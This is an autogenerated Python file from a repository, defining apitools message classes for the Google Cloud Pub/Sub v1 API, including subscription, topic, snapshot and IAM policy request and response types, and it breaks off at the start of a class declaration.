"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | amaclean2/TheLessonBox | 432008fd05db0473e4c3ddb6fb326ac31542ce81 | 593b60832bf95d3b92dd711b05d4d992d3f279a5 | refs/heads/master | 2020-04-30T17:56:16.006932 | 2019-04-10T04:36:13 | 2019-04-10T04:36:13 | 176,994,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,925 | py | """Generated message classes for pubsub version v1.
Provides reliable, many-to-many, asynchronous messaging between applications.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'pubsub'
class AcknowledgeRequest(_messages.Message):
r"""Request for the Acknowledge method.
Fields:
ackIds: The acknowledgment ID for the messages being acknowledged that was
returned by the Pub/Sub system in the `Pull` response. Must not be
empty.
"""
ackIds = _messages.StringField(1, repeated=True)
class Binding(_messages.Message):
r"""Associates `members` with a `role`.
Fields:
condition: The condition that is associated with this binding. NOTE: an
unsatisfied condition will not allow user access via current binding.
Different bindings, including their conditions, are examined
independently.
members: Specifies the identities requesting access for a Cloud Platform
resource. `members` can have the following values: * `allUsers`: A
special identifier that represents anyone who is on the internet;
with or without a Google account. * `allAuthenticatedUsers`: A special
identifier that represents anyone who is authenticated with a Google
account or a service account. * `user:{emailid}`: An email address that
represents a specific Google account. For example, `[email protected]`
. * `serviceAccount:{emailid}`: An email address that represents a
service account. For example, `my-other-
[email protected]`. * `group:{emailid}`: An email address
that represents a Google group. For example, `[email protected]`.
* `domain:{domain}`: The G Suite domain (primary) that represents all
the users of that domain. For example, `google.com` or `example.com`.
role: Role that is assigned to `members`. For example, `roles/viewer`,
`roles/editor`, or `roles/owner`.
"""
condition = _messages.MessageField('Expr', 1)
members = _messages.StringField(2, repeated=True)
role = _messages.StringField(3)
class CreateSnapshotRequest(_messages.Message):
r"""Request for the `CreateSnapshot` method.
Messages:
LabelsValue: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
Fields:
labels: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
subscription: The subscription whose backlog the snapshot retains.
Specifically, the created snapshot is guaranteed to retain: (a) The
existing backlog on the subscription. More precisely, this is
defined as the messages in the subscription's backlog that are
unacknowledged upon the successful completion of the
`CreateSnapshot` request; as well as: (b) Any messages published to the
subscription's topic following the successful completion of the
CreateSnapshot request. Format is
`projects/{project}/subscriptions/{sub}`.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""See <a href="https://cloud.google.com/pubsub/docs/labels"> Creating
and managing labels</a>.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
labels = _messages.MessageField('LabelsValue', 1)
subscription = _messages.StringField(2)
class Empty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo {
rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The
JSON representation for `Empty` is empty JSON object `{}`.
"""
class ExpirationPolicy(_messages.Message):
r"""A policy that specifies the conditions for resource expiration (i.e.,
automatic resource deletion).
Fields:
ttl: Specifies the "time-to-live" duration for an associated resource. The
resource expires if it is not active for a period of `ttl`. The
definition of "activity" depends on the type of the associated resource.
The minimum and maximum allowed values for `ttl` depend on the type of
the associated resource, as well. If `ttl` is not set, the associated
resource never expires.
"""
ttl = _messages.StringField(1)
class Expr(_messages.Message):
r"""Represents an expression text. Example: title: "User account
presence" description: "Determines whether the request has a user
account" expression: "size(request.user) > 0"
Fields:
description: An optional description of the expression. This is a longer
text which describes the expression, e.g. when hovered over it in a UI.
expression: Textual representation of an expression in Common Expression
Language syntax. The application context of the containing message
determines which well-known feature set of CEL is supported.
location: An optional string indicating the location of the expression for
error reporting, e.g. a file name and a position in the file.
title: An optional title for the expression, i.e. a short string
describing its purpose. This can be used e.g. in UIs which allow to
enter the expression.
"""
description = _messages.StringField(1)
expression = _messages.StringField(2)
location = _messages.StringField(3)
title = _messages.StringField(4)
class ListSnapshotsResponse(_messages.Message):
r"""Response for the `ListSnapshots` method.
Fields:
nextPageToken: If not empty, indicates that there may be more snapshot
that match the request; this value should be passed in a new
`ListSnapshotsRequest`.
snapshots: The resulting snapshots.
"""
nextPageToken = _messages.StringField(1)
snapshots = _messages.MessageField('Snapshot', 2, repeated=True)
class ListSubscriptionsResponse(_messages.Message):
r"""Response for the `ListSubscriptions` method.
Fields:
nextPageToken: If not empty, indicates that there may be more
subscriptions that match the request; this value should be passed in a
new `ListSubscriptionsRequest` to get more subscriptions.
subscriptions: The subscriptions that match the request.
"""
nextPageToken = _messages.StringField(1)
subscriptions = _messages.MessageField('Subscription', 2, repeated=True)
class ListTopicSnapshotsResponse(_messages.Message):
r"""Response for the `ListTopicSnapshots` method.
Fields:
nextPageToken: If not empty, indicates that there may be more snapshots
that match the request; this value should be passed in a new
`ListTopicSnapshotsRequest` to get more snapshots.
snapshots: The names of the snapshots that match the request.
"""
nextPageToken = _messages.StringField(1)
snapshots = _messages.StringField(2, repeated=True)
class ListTopicSubscriptionsResponse(_messages.Message):
r"""Response for the `ListTopicSubscriptions` method.
Fields:
nextPageToken: If not empty, indicates that there may be more
subscriptions that match the request; this value should be passed in a
new `ListTopicSubscriptionsRequest` to get more subscriptions.
subscriptions: The names of the subscriptions that match the request.
"""
nextPageToken = _messages.StringField(1)
subscriptions = _messages.StringField(2, repeated=True)
class ListTopicsResponse(_messages.Message):
r"""Response for the `ListTopics` method.
Fields:
nextPageToken: If not empty, indicates that there may be more topics that
match the request; this value should be passed in a new
`ListTopicsRequest`.
topics: The resulting topics.
"""
nextPageToken = _messages.StringField(1)
topics = _messages.MessageField('Topic', 2, repeated=True)
class MessageStoragePolicy(_messages.Message):
r"""A MessageStoragePolicy object.
Fields:
allowedPersistenceRegions: The list of GCP region IDs where messages that
are published to the topic may be persisted in storage. Messages
published by publishers running in non-allowed GCP regions (or running
outside of GCP altogether) will be routed for storage in one of the
allowed regions. An empty list indicates a misconfiguration at the
project or organization level, which will result in all Publish
operations failing.
"""
allowedPersistenceRegions = _messages.StringField(1, repeated=True)
class ModifyAckDeadlineRequest(_messages.Message):
r"""Request for the ModifyAckDeadline method.
Fields:
ackDeadlineSeconds: The new ack deadline with respect to the time this
request was sent to the Pub/Sub system. For example, if the value is 10,
the new ack deadline will expire 10 seconds after the
`ModifyAckDeadline` call was made. Specifying zero might immediately
make the message available for delivery to another subscriber client.
This typically results in an increase in the rate of message
redeliveries (that is, duplicates). The minimum deadline you can specify
is 0 seconds. The maximum deadline you can specify is 600 seconds (10
minutes).
ackIds: List of acknowledgment IDs.
"""
ackDeadlineSeconds = _messages.IntegerField(1, variant=_messages.Variant.INT32)
ackIds = _messages.StringField(2, repeated=True)
class ModifyPushConfigRequest(_messages.Message):
r"""Request for the ModifyPushConfig method.
Fields:
pushConfig: The push configuration for future deliveries. An empty
`pushConfig` indicates that the Pub/Sub system should stop pushing
messages from the given subscription and allow messages to be pulled and
acknowledged - effectively pausing the subscription if `Pull` or
`StreamingPull` is not called.
"""
pushConfig = _messages.MessageField('PushConfig', 1)
class OidcToken(_messages.Message):
r"""Contains information needed for generating an [OpenID Connect
token](https://developers.google.com/identity/protocols/OpenIDConnect).
Fields:
audience: Audience to be used when generating OIDC token. The audience
claim identifies the recipients that the JWT is intended for. The
audience value is a single case-sensitive string. Having multiple values
(array) for the audience field is not supported. More info about the
OIDC JWT token audience here:
https://tools.ietf.org/html/rfc7519#section-4.1.3 Note: if not
specified, the Push endpoint URL will be used.
serviceAccountEmail: [Service account
email](https://cloud.google.com/iam/docs/service-accounts) to be used
for generating the OIDC token. The caller (for CreateSubscription,
UpdateSubscription, and ModifyPushConfig RPCs) must have the
iam.serviceAccounts.actAs permission for the service account.
"""
audience = _messages.StringField(1)
serviceAccountEmail = _messages.StringField(2)
class Policy(_messages.Message):
r"""Defines an Identity and Access Management (IAM) policy. It is used to
specify access control policies for Cloud Platform resources. A `Policy`
consists of a list of `bindings`. A `binding` binds a list of `members` to a
`role`, where the members can be user accounts, Google groups, Google
domains, and service accounts. A `role` is a named list of permissions
defined by IAM. **JSON Example** { "bindings": [ {
"role": "roles/owner", "members": [
"user:[email protected]", "group:[email protected]",
"domain:google.com", "serviceAccount:my-other-
[email protected]" ] }, {
"role": "roles/viewer", "members": ["user:[email protected]"]
} ] } **YAML Example** bindings: - members: -
user:[email protected] - group:[email protected] -
domain:google.com - serviceAccount:my-other-
[email protected] role: roles/owner - members:
- user:[email protected] role: roles/viewer For a description of IAM
and its features, see the [IAM developer's
guide](https://cloud.google.com/iam/docs).
Fields:
bindings: Associates a list of `members` to a `role`. `bindings` with no
members will result in an error.
etag: `etag` is used for optimistic concurrency control as a way to help
prevent simultaneous updates of a policy from overwriting each other. It
is strongly suggested that systems make use of the `etag` in the read-
modify-write cycle to perform policy updates in order to avoid race
conditions: An `etag` is returned in the response to `getIamPolicy`, and
systems are expected to put that etag in the request to `setIamPolicy`
to ensure that their change will be applied to the same version of the
policy. If no `etag` is provided in the call to `setIamPolicy`, then
the existing policy is overwritten blindly.
version: Deprecated.
"""
bindings = _messages.MessageField('Binding', 1, repeated=True)
etag = _messages.BytesField(2)
version = _messages.IntegerField(3, variant=_messages.Variant.INT32)
class PublishRequest(_messages.Message):
r"""Request for the Publish method.
Fields:
messages: The messages to publish.
"""
messages = _messages.MessageField('PubsubMessage', 1, repeated=True)
class PublishResponse(_messages.Message):
r"""Response for the `Publish` method.
Fields:
messageIds: The server-assigned ID of each published message, in the same
order as the messages in the request. IDs are guaranteed to be unique
within the topic.
"""
messageIds = _messages.StringField(1, repeated=True)
class PubsubMessage(_messages.Message):
r"""A message that is published by publishers and consumed by subscribers.
The message must contain either a non-empty data field or at least one
attribute. Note that client libraries represent this object differently
depending on the language. See the corresponding <a
href="https://cloud.google.com/pubsub/docs/reference/libraries">client
library documentation</a> for more information. See <a
href="https://cloud.google.com/pubsub/quotas">Quotas and limits</a> for more
information about message limits.
Messages:
AttributesValue: Optional attributes for this message.
Fields:
attributes: Optional attributes for this message.
data: The message data field. If this field is empty, the message must
contain at least one attribute.
messageId: ID of this message, assigned by the server when the message is
published. Guaranteed to be unique within the topic. This value may be
read by a subscriber that receives a `PubsubMessage` via a `Pull` call
or a push delivery. It must not be populated by the publisher in a
`Publish` call.
publishTime: The time at which the message was published, populated by the
server when it receives the `Publish` call. It must not be populated by
the publisher in a `Publish` call.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class AttributesValue(_messages.Message):
r"""Optional attributes for this message.
Messages:
AdditionalProperty: An additional property for a AttributesValue object.
Fields:
additionalProperties: Additional properties of type AttributesValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a AttributesValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
attributes = _messages.MessageField('AttributesValue', 1)
data = _messages.BytesField(2)
messageId = _messages.StringField(3)
publishTime = _messages.StringField(4)
class PubsubProjectsSnapshotsCreateRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsCreateRequest object.
Fields:
createSnapshotRequest: A CreateSnapshotRequest resource to be passed as
the request body.
name: Optional user-provided name for this snapshot. If the name is not
provided in the request, the server will assign a random name for this
snapshot on the same project as the subscription. Note that for REST API
requests, you must specify a name. See the <a
href="https://cloud.google.com/pubsub/docs/admin#resource_names">
resource name rules</a>. Format is
`projects/{project}/snapshots/{snap}`.
"""
createSnapshotRequest = _messages.MessageField('CreateSnapshotRequest', 1)
name = _messages.StringField(2, required=True)
class PubsubProjectsSnapshotsDeleteRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsDeleteRequest object.
Fields:
snapshot: The name of the snapshot to delete. Format is
`projects/{project}/snapshots/{snap}`.
"""
snapshot = _messages.StringField(1, required=True)
class PubsubProjectsSnapshotsGetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsGetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
resource = _messages.StringField(1, required=True)
class PubsubProjectsSnapshotsGetRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsGetRequest object.
Fields:
snapshot: The name of the snapshot to get. Format is
`projects/{project}/snapshots/{snap}`.
"""
snapshot = _messages.StringField(1, required=True)
class PubsubProjectsSnapshotsListRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsListRequest object.
Fields:
pageSize: Maximum number of snapshots to return.
pageToken: The value returned by the last `ListSnapshotsResponse`;
indicates that this is a continuation of a prior `ListSnapshots` call,
and that the system should return the next page of data.
project: The name of the project in which to list snapshots. Format is
`projects/{project-id}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
project = _messages.StringField(3, required=True)
class PubsubProjectsSnapshotsPatchRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsPatchRequest object.
Fields:
name: The name of the snapshot.
updateSnapshotRequest: A UpdateSnapshotRequest resource to be passed as
the request body.
"""
name = _messages.StringField(1, required=True)
updateSnapshotRequest = _messages.MessageField('UpdateSnapshotRequest', 2)
class PubsubProjectsSnapshotsSetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsSetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this
field.
setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
request body.
"""
resource = _messages.StringField(1, required=True)
setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class PubsubProjectsSnapshotsTestIamPermissionsRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsTestIamPermissionsRequest object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class PubsubProjectsSubscriptionsAcknowledgeRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsAcknowledgeRequest object.
Fields:
acknowledgeRequest: A AcknowledgeRequest resource to be passed as the
request body.
subscription: The subscription whose message is being acknowledged. Format
is `projects/{project}/subscriptions/{sub}`.
"""
acknowledgeRequest = _messages.MessageField('AcknowledgeRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsDeleteRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsDeleteRequest object.
Fields:
subscription: The subscription to delete. Format is
`projects/{project}/subscriptions/{sub}`.
"""
subscription = _messages.StringField(1, required=True)
class PubsubProjectsSubscriptionsGetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsGetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
resource = _messages.StringField(1, required=True)
class PubsubProjectsSubscriptionsGetRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsGetRequest object.
Fields:
subscription: The name of the subscription to get. Format is
`projects/{project}/subscriptions/{sub}`.
"""
subscription = _messages.StringField(1, required=True)
class PubsubProjectsSubscriptionsListRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsListRequest object.
Fields:
pageSize: Maximum number of subscriptions to return.
pageToken: The value returned by the last `ListSubscriptionsResponse`;
indicates that this is a continuation of a prior `ListSubscriptions`
call, and that the system should return the next page of data.
project: The name of the project in which to list subscriptions. Format is
`projects/{project-id}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
project = _messages.StringField(3, required=True)
class PubsubProjectsSubscriptionsModifyAckDeadlineRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsModifyAckDeadlineRequest object.
Fields:
modifyAckDeadlineRequest: A ModifyAckDeadlineRequest resource to be passed
as the request body.
subscription: The name of the subscription. Format is
`projects/{project}/subscriptions/{sub}`.
"""
modifyAckDeadlineRequest = _messages.MessageField('ModifyAckDeadlineRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsModifyPushConfigRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsModifyPushConfigRequest object.
Fields:
modifyPushConfigRequest: A ModifyPushConfigRequest resource to be passed
as the request body.
subscription: The name of the subscription. Format is
`projects/{project}/subscriptions/{sub}`.
"""
modifyPushConfigRequest = _messages.MessageField('ModifyPushConfigRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsPatchRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsPatchRequest object.
Fields:
name: The name of the subscription. It must have the format
`"projects/{project}/subscriptions/{subscription}"`. `{subscription}`
must start with a letter, and contain only letters (`[A-Za-z]`), numbers
(`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`),
plus (`+`) or percent signs (`%`). It must be between 3 and 255
characters in length, and it must not start with `"goog"`.
updateSubscriptionRequest: A UpdateSubscriptionRequest resource to be
passed as the request body.
"""
name = _messages.StringField(1, required=True)
updateSubscriptionRequest = _messages.MessageField('UpdateSubscriptionRequest', 2)
class PubsubProjectsSubscriptionsPullRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsPullRequest object.
Fields:
pullRequest: A PullRequest resource to be passed as the request body.
subscription: The subscription from which messages should be pulled.
Format is `projects/{project}/subscriptions/{sub}`.
"""
pullRequest = _messages.MessageField('PullRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsSeekRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsSeekRequest object.
Fields:
seekRequest: A SeekRequest resource to be passed as the request body.
subscription: The subscription to affect.
"""
seekRequest = _messages.MessageField('SeekRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsSetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsSetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this
field.
setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
request body.
"""
resource = _messages.StringField(1, required=True)
setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class PubsubProjectsSubscriptionsTestIamPermissionsRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsTestIamPermissionsRequest object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class PubsubProjectsTopicsDeleteRequest(_messages.Message):
r"""A PubsubProjectsTopicsDeleteRequest object.
Fields:
topic: Name of the topic to delete. Format is
`projects/{project}/topics/{topic}`.
"""
topic = _messages.StringField(1, required=True)
class PubsubProjectsTopicsGetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsTopicsGetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
resource = _messages.StringField(1, required=True)
class PubsubProjectsTopicsGetRequest(_messages.Message):
r"""A PubsubProjectsTopicsGetRequest object.
Fields:
topic: The name of the topic to get. Format is
`projects/{project}/topics/{topic}`.
"""
topic = _messages.StringField(1, required=True)
class PubsubProjectsTopicsListRequest(_messages.Message):
r"""A PubsubProjectsTopicsListRequest object.
Fields:
pageSize: Maximum number of topics to return.
pageToken: The value returned by the last `ListTopicsResponse`; indicates
that this is a continuation of a prior `ListTopics` call, and that the
system should return the next page of data.
project: The name of the project in which to list topics. Format is
`projects/{project-id}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
project = _messages.StringField(3, required=True)
class PubsubProjectsTopicsPatchRequest(_messages.Message):
r"""A PubsubProjectsTopicsPatchRequest object.
Fields:
name: The name of the topic. It must have the format
`"projects/{project}/topics/{topic}"`. `{topic}` must start with a
letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes
(`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or
percent signs (`%`). It must be between 3 and 255 characters in length,
and it must not start with `"goog"`.
updateTopicRequest: A UpdateTopicRequest resource to be passed as the
request body.
"""
name = _messages.StringField(1, required=True)
updateTopicRequest = _messages.MessageField('UpdateTopicRequest', 2)
class PubsubProjectsTopicsPublishRequest(_messages.Message):
r"""A PubsubProjectsTopicsPublishRequest object.
Fields:
publishRequest: A PublishRequest resource to be passed as the request
body.
topic: The messages in the request will be published on this topic. Format
is `projects/{project}/topics/{topic}`.
"""
publishRequest = _messages.MessageField('PublishRequest', 1)
topic = _messages.StringField(2, required=True)
class PubsubProjectsTopicsSetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsTopicsSetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this
field.
setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
request body.
"""
resource = _messages.StringField(1, required=True)
setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class PubsubProjectsTopicsSnapshotsListRequest(_messages.Message):
r"""A PubsubProjectsTopicsSnapshotsListRequest object.
Fields:
pageSize: Maximum number of snapshot names to return.
pageToken: The value returned by the last `ListTopicSnapshotsResponse`;
indicates that this is a continuation of a prior `ListTopicSnapshots`
call, and that the system should return the next page of data.
topic: The name of the topic that snapshots are attached to. Format is
`projects/{project}/topics/{topic}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
topic = _messages.StringField(3, required=True)
class PubsubProjectsTopicsSubscriptionsListRequest(_messages.Message):
r"""A PubsubProjectsTopicsSubscriptionsListRequest object.
Fields:
pageSize: Maximum number of subscription names to return.
pageToken: The value returned by the last
`ListTopicSubscriptionsResponse`; indicates that this is a continuation
of a prior `ListTopicSubscriptions` call, and that the system should
return the next page of data.
topic: The name of the topic that subscriptions are attached to. Format is
`projects/{project}/topics/{topic}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
topic = _messages.StringField(3, required=True)
class PubsubProjectsTopicsTestIamPermissionsRequest(_messages.Message):
r"""A PubsubProjectsTopicsTestIamPermissionsRequest object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class PullRequest(_messages.Message):
r"""Request for the `Pull` method.
Fields:
maxMessages: The maximum number of messages returned for this request. The
Pub/Sub system may return fewer than the number specified.
returnImmediately: If this field set to true, the system will respond
immediately even if it there are no messages available to return in the
`Pull` response. Otherwise, the system may wait (for a bounded amount of
time) until at least one message is available, rather than returning no
messages.
"""
maxMessages = _messages.IntegerField(1, variant=_messages.Variant.INT32)
returnImmediately = _messages.BooleanField(2)
class PullResponse(_messages.Message):
r"""Response for the `Pull` method.
Fields:
receivedMessages: Received Pub/Sub messages. The list will be empty if
there are no more messages available in the backlog. For JSON, the
response can be entirely empty. The Pub/Sub system may return fewer than
the `maxMessages` requested even if there are more messages available in
the backlog.
"""
receivedMessages = _messages.MessageField('ReceivedMessage', 1, repeated=True)
class PushConfig(_messages.Message):
r"""Configuration for a push delivery endpoint.
Messages:
AttributesValue: Endpoint configuration attributes. Every endpoint has a
set of API supported attributes that can be used to control different
aspects of the message delivery. The currently supported attribute is
`x-goog-version`, which you can use to change the format of the pushed
message. This attribute indicates the version of the data expected by
the endpoint. This controls the shape of the pushed message (i.e., its
fields and metadata). The endpoint version is based on the version of
the Pub/Sub API. If not present during the `CreateSubscription` call,
it will default to the version of the API used to make such call. If not
present during a `ModifyPushConfig` call, its value will not be changed.
`GetSubscription` calls will always return a valid version, even if the
subscription was created without this attribute. The possible values
for this attribute are: * `v1beta1`: uses the push format defined in
the v1beta1 Pub/Sub API. * `v1` or `v1beta2`: uses the push format
defined in the v1 Pub/Sub API.
Fields:
attributes: Endpoint configuration attributes. Every endpoint has a set
of API supported attributes that can be used to control different
aspects of the message delivery. The currently supported attribute is
`x-goog-version`, which you can use to change the format of the pushed
message. This attribute indicates the version of the data expected by
the endpoint. This controls the shape of the pushed message (i.e., its
fields and metadata). The endpoint version is based on the version of
the Pub/Sub API. If not present during the `CreateSubscription` call,
it will default to the version of the API used to make such call. If not
present during a `ModifyPushConfig` call, its value will not be changed.
`GetSubscription` calls will always return a valid version, even if the
subscription was created without this attribute. The possible values
for this attribute are: * `v1beta1`: uses the push format defined in
the v1beta1 Pub/Sub API. * `v1` or `v1beta2`: uses the push format
defined in the v1 Pub/Sub API.
oidcToken: If specified, Pub/Sub will generate and attach an OIDC JWT
token as an `Authorization` header in the HTTP request for every pushed
message.
pushEndpoint: A URL locating the endpoint to which messages should be
pushed. For example, a Webhook endpoint might use
"https://example.com/push".
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class AttributesValue(_messages.Message):
r"""Endpoint configuration attributes. Every endpoint has a set of API
supported attributes that can be used to control different aspects of the
message delivery. The currently supported attribute is `x-goog-version`,
which you can use to change the format of the pushed message. This
attribute indicates the version of the data expected by the endpoint. This
controls the shape of the pushed message (i.e., its fields and metadata).
The endpoint version is based on the version of the Pub/Sub API. If not
present during the `CreateSubscription` call, it will default to the
version of the API used to make such call. If not present during a
`ModifyPushConfig` call, its value will not be changed. `GetSubscription`
calls will always return a valid version, even if the subscription was
created without this attribute. The possible values for this attribute
are: * `v1beta1`: uses the push format defined in the v1beta1 Pub/Sub
API. * `v1` or `v1beta2`: uses the push format defined in the v1 Pub/Sub
API.
Messages:
AdditionalProperty: An additional property for a AttributesValue object.
Fields:
additionalProperties: Additional properties of type AttributesValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a AttributesValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
attributes = _messages.MessageField('AttributesValue', 1)
oidcToken = _messages.MessageField('OidcToken', 2)
pushEndpoint = _messages.StringField(3)
class ReceivedMessage(_messages.Message):
r"""A message and its corresponding acknowledgment ID.
Fields:
ackId: This ID can be used to acknowledge the received message.
message: The message.
"""
ackId = _messages.StringField(1)
message = _messages.MessageField('PubsubMessage', 2)
class SeekRequest(_messages.Message):
r"""Request for the `Seek` method.
Fields:
snapshot: The snapshot to seek to. The snapshot's topic must be the same
as that of the provided subscription. Format is
`projects/{project}/snapshots/{snap}`.
time: The time to seek to. Messages retained in the subscription that were
published before this time are marked as acknowledged, and messages
retained in the subscription that were published after this time are
marked as unacknowledged. Note that this operation affects only those
messages retained in the subscription (configured by the combination of
`message_retention_duration` and `retain_acked_messages`). For example,
if `time` corresponds to a point before the message retention window (or
to a point before the system's notion of the subscription creation
time), only retained messages will be marked as unacknowledged, and
already-expunged messages will not be restored.
"""
snapshot = _messages.StringField(1)
time = _messages.StringField(2)
class SeekResponse(_messages.Message):
r"""Response for the `Seek` method (this response is empty)."""
class SetIamPolicyRequest(_messages.Message):
r"""Request message for `SetIamPolicy` method.
Fields:
policy: REQUIRED: The complete policy to be applied to the `resource`. The
size of the policy is limited to a few 10s of KB. An empty policy is a
valid policy but certain Cloud Platform services (such as Projects)
might reject them.
"""
policy = _messages.MessageField('Policy', 1)
class Snapshot(_messages.Message):
r"""A snapshot resource. Snapshots are used in <a
href="https://cloud.google.com/pubsub/docs/replay-overview">Seek</a>
operations, which allow you to manage message acknowledgments in bulk. That
is, you can set the acknowledgment state of messages in an existing
subscription to the state captured by a snapshot.
Messages:
LabelsValue: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
Fields:
expireTime: The snapshot is guaranteed to exist up until this time. A
newly-created snapshot expires no later than 7 days from the time of its
creation. Its exact lifetime is determined at creation by the existing
backlog in the source subscription. Specifically, the lifetime of the
snapshot is `7 days - (age of oldest unacked message in the
subscription)`. For example, consider a subscription whose oldest
unacked message is 3 days old. If a snapshot is created from this
subscription, the snapshot -- which will always capture this 3-day-old
backlog as long as the snapshot exists -- will expire in 4 days. The
service will refuse to create a snapshot that would expire in less than
1 hour after creation.
labels: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
name: The name of the snapshot.
topic: The name of the topic from which this snapshot is retaining
messages.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""See <a href="https://cloud.google.com/pubsub/docs/labels"> Creating
and managing labels</a>.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
expireTime = _messages.StringField(1)
labels = _messages.MessageField('LabelsValue', 2)
name = _messages.StringField(3)
topic = _messages.StringField(4)
class StandardQueryParameters(_messages.Message):
